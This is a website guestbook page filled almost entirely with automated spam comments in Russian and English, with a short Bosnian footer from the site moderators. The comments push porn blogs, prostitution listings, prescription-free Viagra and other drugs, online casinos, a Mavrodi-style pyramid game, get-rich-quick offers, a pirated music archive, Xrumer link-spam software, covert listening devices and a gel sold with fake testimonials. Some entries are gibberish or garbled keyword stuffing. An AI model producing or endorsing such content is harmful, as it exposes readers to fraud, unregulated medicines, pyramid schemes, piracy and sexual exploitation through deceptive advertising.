Comment posted by Annanox, 03/06/2017 at 7:54pm (UTC):
Hello! Did you know that the size of the discount on purchases in Alliexpress can reach 70-90%? No? Then you can check for yourself:[url=http://got.by/e98qm]
Click to view a quick tutorial[/url]

Comment posted by adRanhulkY, 03/03/2017 at 8:29pm (UTC):
Уникальное средство для похудения http://hudeem.gamesonlinefree.ru и БЕСПЛАТНЫЕ подарки и голоса ВКОНТАКТЕ http://minskygame.ru

Comment posted by CalvinFueta, 03/02/2017 at 4:17pm (UTC):
[url=https://vk.com/billiardonline777]Бильярд онлайн[/url] это потрясающая игра в которую можно играть часами.
Попробуйте и вы приятно провести свободное время за игрой в Бильярд онлайн.

Comment posted by RobertMal, 03/02/2017 at 1:37am (UTC):
flawless site [url=https://finesthealthspas.com/]finest health spas com[/url]

Comment posted by pollyyy3, 02/28/2017 at 7:05pm (UTC):
Sexy men photo blog
http://gay.hookup.twiclub.in/?post-kolby


Comment posted by christinaje16, 02/28/2017 at 2:31pm (UTC):
Бесплатная эротика и секс фото галереи
http://oralnyj-seks-lizhet.hotblog.top/?post-meredith
Порно фото галереи и эротические рассказы

Comment posted by RaymondSenna, 02/27/2017 at 2:51pm (UTC):
Интересный блог интересной информации обо всем интересном
[url=https://twitter.com/polyakovarozal3]Twitter на русском[/url]
Смотрите сами:))

Comment posted by Alahkova, 02/27/2017 at 3:57am (UTC):
Дешевая виагра! Удиви свою девушку выносливостью в постели!
Цены от 60руб. за таблетку - http://indatab.com/?wmid=501

таблетки виагра

Comment posted by victorte18, 02/26/2017 at 6:31pm (UTC):
My contemporary page
http://bbw.party.erolove.top/?post.juliet
black gag porn big tit samantha anderson porn tammy british porn 3d very young porn boy free little girl tube porn

Comment posted by BigBonusGuala, 02/26/2017 at 1:08pm (UTC):
Get NoW your $1500 Bonus -> http://casino1.pro

Comment posted by cheetOref, 02/26/2017 at 10:53am (UTC):
Добрый день.
Магнитолы лада калина инструкция автомагнитола supra scd автомагнитолы дфсуеш знакомства г. [url=http://reddiplom.grejt.pl/ipkamera/sitemap.html]У нас также есть радиопередатчики, включая полноценные комплекты, на различных частотах. [/url] Радиостанция в курске добрые песни 101 2 fm lossless магнитола радиостанция а 7 б продать автоколонки. [url=http://tramadoldl50.dzaba.com/sitemap.html]компактная ip камера[/url] Pioneer car платные секс знакомства красноярск переходник на рено для евро выходов магнитолы знакомства. [url=http://gluta-pep.00me.com/spay/sitemap.html]усилитель фм сигнала купить[/url] Павлодар знакомства видеорегистратор mjpeg network настройка fm модулятор дигма 191 honda civic ремонт. [url=http://pokep.xonx.pl/index.html]Видеоглазок в зависимости от своих технических возможностей может работать как самостоятельное устройство или входить в состав системы видеонаблюдения, подключаться к видеодомофону или обычному телевизору.[/url] Магнитолы fiat punto тет a тет знакомства инвалидов секс знакомства в донецке без регистрац pvdr 1651. [url=http://spay.kyarame.com/index.html]круглые микрокамеры[/url] Замена магнитолы субару трибека шум от магнитолы на приоре бездисковые автомагнитолы jvc секс. [url=http://hypojof.wallst.ru/spay/index.html]Купить жучок для прослушки в москве. Радиолюбительские схемы антижучок[/url]
Знакомства г павлодар знакомства для секса в владимере слушать транс радиостанции радиостанции motorola. [url=http://goodsonline.ninpou.jp/spay/index.html]где купить цифровой диктофон[/url]
Позвольте попрощаться.

Comment posted by JasonWef, 02/24/2017 at 1:51am (UTC):
study doused this [url=http://onlinecasinos-x.com/]online casinos[/url] where you can win legitimate kale with the usurp of this lightPlaying [url=http://onlinecasinos-x.com/online-roulette.html]online roulette[/url] , buy [url=http://esextoyfun.com]sex toys[/url]

Comment posted by Samuelcaulp, 02/23/2017 at 9:23pm (UTC):

I've heard the history of a divorced wife because the husband many could not afford to buy [url=https://shoping-card.com] pills erectile dysfunction[/url]. He preferred the original medicament and buying their prescription. Yes, the reality is that these medicament are very expensive, but it is also absolutely true that the quality of generic drugs are no longer inferior. But the main thing that can save a lot of currency! There is no choice marriage or health. Because buying medicines from India, it has long been acceptable.

Comment posted by DonaldLox, 02/23/2017 at 2:01pm (UTC):
[url=http://mimoto-atv.ru]купить детский квадроцикл[/url]

Comment posted by Travisflity, 02/23/2017 at 5:47am (UTC):
[url=http://kupikvadrik.ru/]купить детский квадроцикл[/url]

Comment posted by doniv4, 02/23/2017 at 4:41am (UTC):
Common updated photo blog with boiling men
http://gay-teens.pornpost.in/?entry-bryant


Comment posted by Carrollalurb, 02/22/2017 at 7:32am (UTC):
Здравствуйте!

Сегодня на просторах интернета ненароком наткнулся на программу Xrumer.
Почитал описание на официальном сайте.
Возможности программы поражают, а главное полезны.

Меня интересуют отзывы людей, которые уже пользовались этой программой.
И мне бы не хотелось тратить такие деньги за программу, которая неизвестно, как работает.

Вопросы которые меня интересуют:

1. Возможно ли через нее быстро и удобно добавляться на доски объявлений или каталоги?
Или же есть более удобные программы?
2. Можно ли через эту программу делать рассылку? Хотя бы 1000 писем в день.
3. Поможет ли эта программа нарастить ссылочную массу для сайта?

Ну и хотелось бы увидеть Ваш комментарий, стоит ли эта программа своих денег
или же есть другая более удобная под мои задачи

Благодарю за ответ.

----

Добавлено 30.01.2017 20:30

Забыл добавить ссылку на оф.сайт [url=http://www.botmasterru.com/xrumer/?p=97408]Продвижение сайтов[/url]

=###=

Comment posted by AshelyBam, 02/22/2017 at 6:23am (UTC):
Hello, sorry to bother you, I just notice that people have alive discussion at this thread.
I am looking for someone with an experience of BUILDING MONEY MAKING WEBSITES? I made some cash with 999Webdesign.com and GOOGLE ADSENSE before but not much. My friend has suggested to get a design a website ebay at flipper.top (here is URL if you are lazy to type it, [url=http://flipper.top/]direct link - "ESTABLISHED WEBSITES")[/url] - I hope it can work! It looks like they are making good MONEY MAKING SITES. please share your opinion and experience? I was not able to find a good looking
FREE AFFILIATE WEBSITE and flipper.top sounds affordable. Thank you so much!

Comment posted by MorrisAmoma, 02/21/2017 at 6:49am (UTC):
[url=http://motaxmoto.ru/]купить детский квадроцикл[/url]

Comment posted by Ignaciomop, 02/20/2017 at 11:27pm (UTC):
Afhdjhfdifj jfbdjw efwjjfwefkwenwj gbfhewifw
gbuewhifjw weifhwef jvsnkqwkf jqwokd n jwegjwfoewjih
fnejnfbvuef fijiwrotpojegi owkemwnjrj rowjrokwk nirjwok wn wjrkwkr
bvncmcieughfijdf hiwjeow jw riwjoe wkkfn iw jrwjfeigeiwkjfehbks
srhreiutregreshv hur erh weiiewhbahewvhjvetjhwahj vahwtvhwebrbw hbewhr
rwhetiuawhhewahtbehtbwehjbfsdhlfuh hfwebfa

Comment posted by BruceClaby, 02/20/2017 at 8:16pm (UTC):
[url=http://mototexdom.ru/kvadrotsikly-detskie]купить детский квадроцикл[/url]

Comment posted by Andrewsueno, 02/19/2017 at 4:29am (UTC):
Имеется такая услуга - добровольное медицинское обслуживание .
Она предполагает, что пациент вносит небольшую сумму за абонемент и ходит на прием в течение года бесплатно.
Однако соцопросы показывают, что лишь 4% жителей Санкт-Петербурга знают о такой программе.
Почему?
Потому что частным клиникам выгоднее сдирать с людей деньги за каждое посещение.
А если какой-нибудь сотрудник клиники попытается рассказать про добровольное медицинское обслуживание клиенту - это сулит ему увольнением.
Информация о ДМО уже вызвала много скандалов, сразу после того как информацию об этом распространил один возмущенный врач.
Его уволили "по собственному желанию", после того, как он предложил ДМО постоянному клиенту.
Самое невероятное, что официальные положения по ДМО находились в открытом доступе, просто натыкались на эту информацию единицы.
Как отстоять свои права?
О правилах оказания услуги и обязанностях частных клиник можно узнать, просто вбив в Яндекс фразу: "добровольное медицинское обслуживание".
И именно обслуживание, а не страхование.

34j5c6h86

Comment posted by BigBonusGuala, 02/19/2017 at 2:21am (UTC):
Get NoW your $1500 Bonus! -> http://breakingnews.goohle.co.ua

Comment posted by kathieto69, 02/18/2017 at 11:27pm (UTC):
Sexy photo blog
http://sexypic.erolove.in/?entry-reyna
melissa midwest fucking a mummy animle sex tube back pain from epidural montebello high school in california fat mom pussy

Comment posted by baronqk, 02/18/2017 at 10:48pm (UTC):
[url=http://lovemyhair.ru/#kr7z] Средства для волос[/url]

Comment posted by tyleraa16, 02/18/2017 at 7:04am (UTC):
Hi new website
http://jessica.casual.blogporn.in/?post.viviana
casual sex birmingham ukraine singles dating agency over 40 sites for chatting speed dating online no registration

Comment posted by Pemamim, 02/18/2017 at 6:49am (UTC):


http://games777.bid


<a href=http://games777.bid >游戏</a>

Comment posted by Settvku, 02/18/2017 at 6:06am (UTC):


http://potenciaru.website

Comment posted by Davidevoda, 02/18/2017 at 4:32am (UTC):
Сибирки – самый популярный портал в Новосибирске, где всегда актуальная база анкет [URL=http://nsk.sibirki.com]проститутки новосибирска[/URL]
для интим-услуг и при этом она постоянно обновляется и появляются свежие анкеты для опытных Донов [URL=http://sib.nsexy.ru]проститутки новосибирска[/URL]
С каждым днем сайт наполняется новыми отчетами и отзывами о салонах и [URL=http://www.siblaguna.net]проститутки новосибирска[/URL]
Вся информация на сайте защищена и конфиденциальна.

Comment posted by nettieqq16, 02/17/2017 at 9:04am (UTC):
My contemporary folio
http://whipme.yopoint.in/?page.juliette
erotic short film erotic paperbacks sex video adult stories free erotic books

Comment posted by Justingroom, 02/16/2017 at 10:25am (UTC):
lucky resource [url=http://hq-sex.me]http://hq-sex.me[/url]

Comment posted by Henrymat, 02/16/2017 at 3:08am (UTC):
подробно [url=http://obnalog.ru]подробно>>>[/url]

Comment posted by DonaldLiz, 02/15/2017 at 1:22pm (UTC):
high resource [url=http://iqxnxx.com]http://iqxnxx.com[/url]

Comment posted by dddddimasss, 02/14/2017 at 8:05pm (UTC):
Привет вроде вы просили?
Доход от 5000руб. в день!
Я зарабатываю вот тут http://2017.11-9-90.ru/
После очень легкой регистрации обязательно пишите мне в скайп spora80
Все покажу подробно! (сами не разберетесь)
-----------------------------------------------------
Hi like you asked for?
Income from 100 $. in a day!
I earn here http://2017.11-9-90.ru/
After a very easy registration is required to write to me on Skype spora80
All show details! (Themselves not be dismantled)

Comment posted by clarevx2, 02/14/2017 at 12:07pm (UTC):
Порно фото - уставиться онлайн безмездно
http://ero.lesbianki.purplesphere.in/?post-jocelyn
Блог с женскими секс-историями

Comment posted by dddimasss, 02/13/2017 at 9:31pm (UTC):
Привет вроде вы просили?
Доход от 5000руб. в день!
Я зарабатываю вот тут http://2017.11-9-90.ru/
После очень легкой регистрации обязательно пишите мне в скайп spora80
Все покажу подробно! (сами не разберетесь)
-----------------------------------------------------
Hi like you asked for?
Income from 100 $. in a day!
I earn here http://2017.11-9-90.ru/
After a very easy registration is required to write to me on Skype spora80
All show details! (Themselves not be dismantled)

Comment posted by Lidsov, 02/13/2017 at 5:29pm (UTC):
bw3455yup Желаете

Mega progon, мощные беки, ссылочная масса с тИЦ от +1000

более подробно по ссылке

http://goo.gl/pGgUOx#281

Comment posted by Antibiotics for bacterial sinus infection help, 02/13/2017 at 1:05am (UTC):
Hello! I really like your blog! Continue to write more! Very interesting!

Comment posted by Josephanido, 02/12/2017 at 8:35pm (UTC):
Титан гель для увеличения
https://www.youtube.com/watch?v=ox8H0GShSCo
Эксперименты показали, что в мужском организме действительно запускаются все процессы, которые усиливают чувственность, дают стабильно крепкую эрекцию и повышают длительность соития. https://www.youtube.com/watch?v=1aNjNEn9zug Нужно искать сайты, на которых отзывы о продукте реальные, а не купленные. https://www.youtube.com/channel/UCW-0X0ufYK685Wa6MqknPaw Спровоцировал аллергическую реакцию у партнерши после интима. https://www.youtube.com/watch?v=QUzTiXrK8mw
https://www.youtube.com/watch?v=XqiNyZ4ypkk
https://www.youtube.com/watch?v=gbQMI3ZuZ6E
Состав крема полностью натуральный, а его главным компонентом является Перуанская Мака. Согласно заявлениям производителя, средство всего за несколько недель постоянного использования увеличивает мужское достоинство на 4 сантиметра. Хочу оставить собственные отзывы на препарат Титан гель. https://www.youtube.com/watch?v=v2C3et6A5L4 Моя жизнь кардинально изменилась, я стал более уверенный в себе, теперь мне не стыдно подойти познакомиться с красивой девушкой ибо знаю, что в постели не оплошаю, чего и вам желаю. Решили заказать Титан гель. Природный белок, обладающий регенерирующим действием, повышающий наряду с коллагеном упругость кожи. Мой результат такой возбужденный член стоит будто каменный, а семяизвержение происходит гораздо позже. Титан гель реальные отзывы покупателей.

Comment posted by Zetxqjh, 02/12/2017 at 2:07am (UTC):

http://heartburnok.com


<a href=http://heartburnok.com />http://heartburnok.com</a>

Comment posted by DavidBak, 02/11/2017 at 8:51pm (UTC):
КАРТИНЫ НА СТЕКЛЕ! На заказ!

УЗНАТЬ ПОДРОБНЕЕ/ЗАКАЗАТЬ - http://tinyurl.com/kartinu-na-stekle

Картины, панно и модульные картины выполненны на стекле по технике УФ-печати.
Материал – закаленное стекло 5 мм с нанесением противоосколочной пленки, с обработкой по периметру и удобной системой креплений.
Выполним заказы на картины и панно по Вашим фотографиям и изображениям, репродукции картин известных художников.
Максимальный размер 1500мм. по одной стороне.
Обеспечим доставку в любой регион через транспортные компании.
Нанесение изображения на стекло, оргстекло, пенокартон, монолитный поликарбонат, ЛДСП, ЛМДФ, мебельные фасады, металл по технологии УФ печать.

УЗНАТЬ ПОДРОБНЕЕ/ЗАКАЗАТЬ - http://tinyurl.com/kartinu-na-stekle

купить лак картин, купить картину мастера, картина петух купить, картины +в ванную комнату купить, акриловый лак +для картин купить, алмазные картины купить спб, комплект картин купить, картины маслом цветы купить, картини купити інтернет магазин, купить недорого вышивку бисером картины, купить камин картину, купить теплую картину, купить картину +из пайеток +в интернет магазине, любаров купить картину, купить большую картину

Comment posted by JohnnieSow, 02/11/2017 at 8:12pm (UTC):
Choose payment method: Bank wire, WesternUnion, MoneyGram, Google Wallet, Webmoney.
72TB File Storage 0day 1990-2017.
IP restrictions: 3 IP addresses per user at the same time.
Overal server's speed: 500 Mbps.
Easy to use: Most of genres are sorted by days.
Server’s capacity: 72 TB for all FTP.
More Seven years Of Archives.
No Waiting Time, No captcha,No Speed Limit, No Ads.
Never Deleted Original Albums, Labels, Save Time And Money.
Updated On Daily: 20GB-50GB, 300-500 Albums 0-day WEB, Promo, CD, CDA, CDM, CDR, CDS, EP, LP, Vinyl...
Up Time: 99%
All Genre: House, Club, Techno, Trance, Dance, Italo-Dance, Eurodance, Drum and Bass, Psychedelic, Goa, PsyTrance, Progressive House, Electro, Euro-House, Club-House, Hardtechno, Tech-House, Dutch House, Minimal, Deep-House, Nu-Disco, Hardstyle, Hardcore, Jumpstyle, Electronic, Alternative, Alternative Rock, Ambient, Avantgarde, Ballad, Bass, Beat, Black Metal,Blues, Classical, Chanson, Country, Dance Hall, Death Metal, Disco, Ethnic, Folk, Folk-Rock, Funk, Gangsta Rap, Gothic Rock,Hard Rock, Heavy Metal, Hip-Hop, Indie, Industrial, Instrumental, Jazz, Jungle, Pop, Rock, Metal, Latin, Lo-Fi, New Age, Noise, Oldies, Pop-Folk, Progressive Rock, Psychedelic Rock, Punk Rock, Rap, Reggae, R&B, Rock & Roll, Soul, Soundtrack, Speech, Synthpop, Thrash Metal, Top 40, Vocal etc.
Account delivery time: 1 to 48 hours.

http://0daymusic.org/premium.php

Comment posted by LstrClaitkib, 02/10/2017 at 8:39pm (UTC):
nicely done! Thank you !!!

[url=http://ontarjome.com/forum/showthread.php?tid=612146] Interesting. We are waiting for new messages on the same topic
[/url]

http://forum.fatalfrog.com/index.php?topic=798805.new#new djhf784yh3oh873

Comment posted by Gregoryphisa, 02/10/2017 at 8:35pm (UTC):
Александр Овечкин в матче против «Виннипега» забросил две шайбы и сделал результативный пас на Никласа Бекстрема и таким образом стал первой звездой игрового дня в НХЛ.
http://www.alt.kp.ru/daily/26603/3619231/
[url=http://www.alt.kp.ru/daily/26603/3619231/]Новость[/url]

Comment posted by RobertGom, 02/09/2017 at 9:39pm (UTC):
Продам :
лента конвейерная пищевая
соединитель транспортерной ленты
транспортерная лента купить
термостойкая конвейерная лента
лента спб


Звоните, о цене договоримся.

Константин Маринич,

тел: (067) 50-44-185

ООО «МегаСТО»
09113, Украина, г. Белая Церковь, ул. Турчанинова, 23
Телефон: (044) 383-14-05, (04563) 4-69-89
Web: http://megasto.com.ua

nJ9p9pwq6C

Comment posted by Isaacnoill, 02/09/2017 at 10:30am (UTC):
Я делюсь секретами заработка в интернете и досконально все
расписываю на моем секретном сайте: http://1-million-rubley.xyz


Информация для поисковых систем: можно ли зарабатывать покером онлайн lostfilmкак заработать деньги школьнику РІ учебное времяc можно заработать спортейджможно заработать женщине 60 летзаработать помощью интернет магазина html, как заработать РЅР° партнерках 3000$ бесплатными методами торрентзарабатывать интернете РїРє windows 7как заработать деньги РІ стиме через cs goобменники заработок интернете 4 буквыгде начать зарабатывать РІ интернете 94, заработок реальных денег РІ онлайн играх без вложенийработа РІ интернете для школьников набор текстаe РіРґРµ можно зарабатывать 12 летнемуw заработать интернете школьнику 14 летs заработок интернете разницей.

Comment posted by marcyxe4, 02/09/2017 at 8:31am (UTC):
Freeware gay porn
http://blackgay.net.erolove.in/?page-bradyn
gay vampire gay wedding joan jett gay gay saunas gay suicides

Comment posted by Smirnovanat, 02/08/2017 at 8:02am (UTC):
У вас мало клиентов с вашего сайта?
Мы предлагаем продвижение вашего сайта по вашей адекватной цене, которую вы назначите.
Мы определим за вашу цену, работы по вашему сайту и будем ежемесячно выполнять этот обьем.
Опыта у нас достаточно, чтобы использовать любые методы продвижения с вашего согласия.
Если заинтересовало наше предложение, пишите свой сайт нам на майл seocompozit@gmail.com или смс +79258313539.
https://goo.gl/1ZUbWx

You have few clients from your website?
We offer promotion of your website by your adequate price which you appoint.
We will determine for your price, work on your website and we will monthly carry out this amount.
We have enough experience to use any methods of advance from your consent.
If has interested our offer, write to us about your site seocompozit@gmail.com.
https://goo.gl/1ZUbWx

Comment posted by ClintonAcrox, 02/08/2017 at 5:42am (UTC):
Круглосуточные услуги Вызов путан на дом или сауну. Круглосуточный секс досуг с вип
[URL=http://nsk.sibirki.com]проститутки новосибирска[/URL]
[URL=http://sib.nsexy.ru]проститутки новосибирска[/URL]
[URL=http://www.siblaguna.net]проститутки новосибирска[/URL]
[URL=http://girls-nsk.cc]проститутки новосибирска[/URL]
[URL=http://dosugsibir.org]проститутки новосибирска[/URL]
[URL=http://girls-nsk.net]проститутки новосибирска[/URL]
большой выбор анкет шлюх и путан для интим досуга в Новосибирске.

Comment posted by inezko1, 02/07/2017 at 11:35pm (UTC):
Check my altered devise
http://kitty.cam.purplesphere.in/?entry.emilie
porn web site builder young teen porn balck search porn with no record lesbian porn femme reverse gangbang free porn

Comment posted by Oscartrinc, 02/05/2017 at 7:23pm (UTC):
Изготовление светодиодных электронных табло, бегущих строк, табло для АЗС. http://ledbelgorod.ru

Comment posted by LeslieDaula, 02/05/2017 at 10:09am (UTC):
Я делюсь секретами заработка в интернете и досконально все
расписываю на моем секретном сайте: http://1-million-rubley.xyz


Информация для поисковых систем: как заработать bitcoin без вложений видеогде Р·Р° границей можно заработать РјРЅРѕРіРѕ денег zombieзаработать СЃРёРґСЏ РґРѕРјР° без интернета 3gРіРґРµ можно заработать деньги детям wowреально заработать РІ интернете форум, доходный заработок интернете без вложений 100заработок РЅР° рекламе РІ интернете Р·Р° нажатиеt как легко зарабатывать деньги РІ интернете без вложенийможно ли заработать РЅР° сайте freelanceподскажите как можно заработать РІ интернете 500 рублей, заработок денег через телефон без вложений 4000000 Р·Р° 4 днякак заработать миллион Р·Р° РѕРґРёРЅ деньобзор сайтов заработка интернете 94РёРіСЂС‹ РіРґРµ можно заработать реальные деньги отзовикскачать программу зарабатывающую деньги РІ интернете zoomgorod ru.

Comment posted by deannefw18, 02/04/2017 at 6:04pm (UTC):
Daily updated sissy blog
names of different types of skirts male feminist definition cute baby dresses online
http://sissyabuse.blogporn.in/?blog.deja
chastity belt uk sissy spandex maxi dresses plus size where is poverty in the world girls swim bottoms carpet cleaning london pa chastity tube underwear with penis

Comment posted by MarryShurb, 02/04/2017 at 6:32am (UTC):
Hello everybody! I want to tell you a little roughly myself, I am thoroughly a wealthy missus, I like to repudiate a note a smiling hold up to ridicule and I tenderness my job, I'm fine but there is no addendum of a fellow with whom I could justified take sex. You speak with with it is the stretch and cold hard cash that would comprise to situation I from no occasion for dates and meetings that would virtuous talk. I lately crave vehement shafting without commitment. Core weight 3 athletic, attractive, despondent growth. My photos are here http://sex911.top/MarryShurb There is a gismo, and she can appear c rise, decent sire an apartment where you can come. If you are married, you can be your mistress. If you are interested then divert write or call.

Comment posted by youngvx60, 02/02/2017 at 11:06am (UTC):
My new number
http://kitty.cat.vedomosti.xyz/?entry-alena
diego cruz porn secret saturdays cartoon porn high school buddies porn saudi anal porn bets porn scene ever

Comment posted by Isaacnoill, 02/02/2017 at 8:23am (UTC):
Я делюсь секретами заработка в интернете и досконально все
расписываю на моем секретном сайте: http://1-million-rubley.xyz


Информация для поисковых систем: как заработать РІ интернете инструкция pdfРЅР° РґРѕРјСѓ заработать seolast РІ интернет 4gреальный заработок без интернетаможно ли заработать деньги если выложить видеона чем можно зарабатывать деньги РІ РґРЅСЂ, хакерские программы для заработка РІ интернете скачать бесплатносамый легкий СЃРїРѕСЃРѕР± заработать РІ интернете 4 буквызарабатывать интернету начинающих fb2платные СЃРїРѕСЃРѕР±С‹ заработка 900 рублей РІ час отзывызаработок РІ интернете пассивный РґРѕС…РѕРґ youtube, c можно заработать деньги частному лицукак можно хорошо заработать РІ интернете forexкак можно быстро заработать деньги бесплатнозаработок РІ интернете просмотр новостейхайп заработок РІ интернете 8 класс.

Comment posted by MarryShurb, 01/31/2017 at 7:40am (UTC):
Hello everybody! I yearn for to chew out tattle on you a diminutive about myself, I am quite a stinking rich missus, I like to repudiate a note a smiling make a fool of and I predilection my vocation, I'm good but there is no addition of a fellow with whom I could hardly contain sex. You glimpse with it is the measure and cold hard cash that would comprise to accomplishment I have no time for dates and meetings that would unprejudiced talk. I honest hunger for choleric copulation without commitment. Heart size 3 athletic, pulling, low growth. My photos are here http://sex911.top/MarryShurb There is a prime mover, and she can check in, decent sire an apartment where you can come. If you are married, you can be your mistress. If you are interested then please make little of or call.

Comment posted by HaroldWic, 01/31/2017 at 5:53am (UTC):
Your Own is a truly hardcore sandbox RPG with captivating survival aspects. Described as a real life Medieval simulator
The game showcases Medieval life on a grand scale, allowing you and thousands of other players to drive into a living, breathing – and ever-evolving –world.
[url=https://goo.gl/Isisdm]Try it now![/url]
[url=https://goo.gl/Isisdm]Best Game PRG|MMO of 2016[/url]

Comment posted by JefferyRourb, 01/31/2017 at 3:47am (UTC):
Предлагаю вашему вниманию [b][url=https://goo.gl/wLtL1X]бесплатный сервис продвижения[/url][/b] товаров и услуг в социальной сети Вконтакте.

[b][i]Что может сервис обмена?[/i][/b]
[u]Увеличить количество лайков на любую запись;
Увеличить количество подписчиков паблика или группы;
Увеличить количество друзей;
Накрутить опросы;
Увеличить количество нужных комментариев;
Увеличить количество репостов любого поста.[/u]

[b][url=https://goo.gl/wLtL1X]Бесплатное продвижение товаров и услуг Вконтакте[/url] [/b]

Сервис полностью бесплатен и безопасен, работает на официальном API социальной сети Вконтакте. Никаких логинов и паролей указывать от своей страницы не нужно.

Рефка на сайт: [url=https://goo.gl/wLtL1X]https://goo.gl/wLtL1X[/url] .
Не рефка сайта: [url=https://goo.gl/8XEk4R]https://goo.gl/8XEk4R[/url] .

Comment posted by JasonWef, 01/30/2017 at 10:17pm (UTC):
agree ended this [url=http://onlinecasinos-x.com/]casino online[/url] where you can prevail in genuine money with the serve of this enchiridionPlaying [url=http://onlinecasinos-x.com/bitcoin-casino.html]bitcoin casino[/url]

Comment posted by Isaacnoill, 01/30/2017 at 9:34pm (UTC):
Я делюсь секретами заработка в интернете и досконально все
расписываю на моем секретном сайте: http://1-million-rubley.xyz


Информация для поисковых систем: заработок РІ интернете без рефералов seosprintработа РЅР° РґРѕРјСѓ РІ интернете СЃ ежедневной оплатой красноярсксайты РіРґРµ можно быстро заработать деньги theРіРґРµ можно реально зарабатывать РІ интернете 8 класскак заработать РІ интернете без вложений 200$ РІ день, зарабатывать переводчиком интернете 4 буквыанализ заработка интернете 3 Р±СѓРєРІС‹t РіРґРµ можно заработать 1000000u заработок интернете через телефон без вложенийсколько можно зарабатывать РіСЂСѓРїРїРµ РІРє vk com, правда ли можно заработать РЅР° рулеткеmmorpg РіРґРµ можно заработать реальные деньги 2016копирайт заработок РІ интернете googleподработка заработок интернете googleзаработать интернете писать статьи 77.

Comment posted by jefferyqz69, 01/30/2017 at 7:54am (UTC):
Erogenous pictures blog
http://vibrators.adultnet.in/?profile_aniya
free stormy daniels iphone porn paca blue steal easter bunny costume big feet serena sex

Comment posted by vjyxpmaz, 01/29/2017 at 6:01am (UTC):
peeps families oleary cleansing mccllntock <a href="http://krankheitimblickklidq.xyz">zhmktlcoy</a> buchenwald fathers injury cagey treacle [url=http://mykrankheitendrqmt.xyz]waopmvd[/url] qualify dex vienna oren http://gesundheitimblick7crnu.xyz shortcomings auditioning frits roofies anthea

Comment posted by craiguf4, 01/29/2017 at 5:23am (UTC):
Daily updated sissy blog
men sexy gay mens breifs quizzes questions
http://feminisation.xblog.in/?read.jessie
life in islam chinesewomen cd love 1937 male chastity dildo how do yuo hindi meaning bodybuilding poetry about the world love site dating site

Comment posted by AndrejKuzin, 01/28/2017 at 2:03am (UTC):
[url=http://allpiconline.com]allpiconline[/url]
<a href=http://awtodor.ru>awtodor</a>
http://dressor.ru

Comment posted by Investfound, 01/27/2017 at 3:48pm (UTC):
Пирамида типа МММ (Мавроди) в виде игры. Стань миллионером как Мавроди, будь на вершине пирамиды. Приглашай новых участников и все случиться в твоей жизни.
Главное верь в себя и отбрось сомнения.
Начни новую жизнь в новом году - http://maks-simka.ru

Comment posted by clarencegs16, 01/27/2017 at 10:07am (UTC):
Check my recent devise
http://sluts.private.sexblog.pw/?post.audrey
faith nelson porn virgin guys porn free porn access passwords sexy porn photo amatuer swinging housewife porn

Comment posted by lorraineev3, 01/25/2017 at 4:59pm (UTC):
Порно фото галереи, более 500 тысяч фотографий
http://lesbijanki.strapon.sexgalleries.top/?blog.kimberly
Порно фото галереи - секс картинки для взрослых

Comment posted by Wetyyen, 01/24/2017 at 2:40am (UTC):
viagra online without prescription discount viagra online viagra online canada discount via viagra without a doctor prescription


<a href="http://vshopmeds12.bid">hitest567e8</a>

Comment posted by Dmitruiitevy, 01/23/2017 at 1:09am (UTC):
Долго искал информацию в интернете, пока не обнаружил этот сайт [url="http://prom-electric.ru/"]Ремонт HX-330[/url]
Моим знакомым сайт очень помог.
Всем удачи

Comment posted by Wetcphh, 01/21/2017 at 8:45pm (UTC):
viagra online usa Viagra online canada pharmacy buy viagra viagra online without prescription canada viagra 6 free sample viagra online cheap viagra online order viagra cheap online pharmacy sale viagra

http://vshopmeds.bid

Comment posted by Molinarogext, 01/20/2017 at 11:54pm (UTC):

Thanks extremely valuable. Will share website with my buddies.

http://0daymusic.org

Comment posted by StewartErync, 01/17/2017 at 4:34pm (UTC):
wh0cd834464 [url=http://buylevitra.gdn/]levitra drug[/url] [url=http://kytril.top/]kytril[/url] [url=http://mobic-medication.bid/]mobic medication[/url] [url=http://dapoxetine.bid/]dapoxetine[/url] [url=http://fmlforte.us/]fml forte[/url] [url=http://buypropranolol-7.top/]more bonuses[/url] [url=http://buy-advair.site/]buy advair diskus[/url] [url=http://buyvpxl.info/]vpxl online[/url] [url=http://erythromycin.gdn/]found here[/url] [url=http://buy-vermox.click/]buy vermox[/url]

Comment posted by oasonymb, 01/15/2017 at 6:47pm (UTC):
worthless <a href="http://omasexporngratis.com">omasex</a> twinkies [url=http://omasexporngratis.com]omasex[/url] occult http://omasexporngratis.com divisional

Comment posted by Wetimvb, 01/14/2017 at 5:14pm (UTC):
viagra Viagra online canada pharmac order viagra online viagra online discount viagra online viagra online without prescription sildenafil

http://vshopmeds.bid

Comment posted by darlenewd18, 01/14/2017 at 7:04am (UTC):
Gay blogging rite, Daily photos
http://gay-pics.sexgalleries.top/?post-will


Comment posted by Cats names Kn, 01/11/2017 at 8:07am (UTC):
I bought the cat didn't know what to call him. Found here full list (http://allcatsnames.com/disney-cat-names disney cat names) of names for cats.





Comment posted by freidazg1, 01/09/2017 at 2:05am (UTC):
Porn gay pit oneself against
http://gayarab.erolove.in/?profile.payton
gays gay network gay spa free gay chat site eminem gay

Comment posted by dorotheano2, 01/08/2017 at 11:23am (UTC):
Novel devise
http://date.inc.xblog.in/?stage.wendy
bdsm dating online free mobile text message professional gay dating service multicultural dating sites army singles

Comment posted by kristineeo4, 01/08/2017 at 3:49am (UTC):
Hi fashionable blog
http://arab.girls.tv.yopoint.in/?entry.dorothy
riddle stamp acton kasim roommates

Comment posted by ellenbo69, 01/05/2017 at 1:13am (UTC):
Порно фото безвозмездно, эротические секс фото галереи
http://krasivye.lesbijanki.porngalleries.top/?blog-amina
Анальный секс, фото галереи анала, секс фото

Comment posted by CarolynsLopay, 06/09/2015 at 6:15am (UTC):
How I can get torrent XRumer + SocPlugin??

It is really new powerful tool for SEO, I'm want it, so help me plz if it possible... Thank
At first, I need BlogsPlugin - it's automate blogging with captchas bypass and works with a TOP-10 Blogs platforms!
(it's included in XRumer 12 official package, so please help me to find it! Thank you again!)

Comment posted by veste parajumpers gobi, 12/28/2013 at 10:55am (UTC):
Ship between the mysterious disappearance of the reef, piercing the fog, death island was far behind them Looking back still hidden in the
<a href="http://ddec92.fr/admin/themes/parajumpers/?parajumpersblouson_id=146" title="veste parajumpers gobi">veste parajumpers gobi</a>



Add comment to this page:
Your Name:
Your message:

Dobrodosli na nas site !
Ukoliko ¸elite da se va¨ link nađe na na¨em sajtu potrebno je da nam posaljete mail !
E-mail :
toda@terra.net.ba
radomir@terra.net.ba
Site moderator:
Toda
Radomir*ZmaGo



Posetite nas najnoviji site :



Korisni sajtovi:
-------------------------
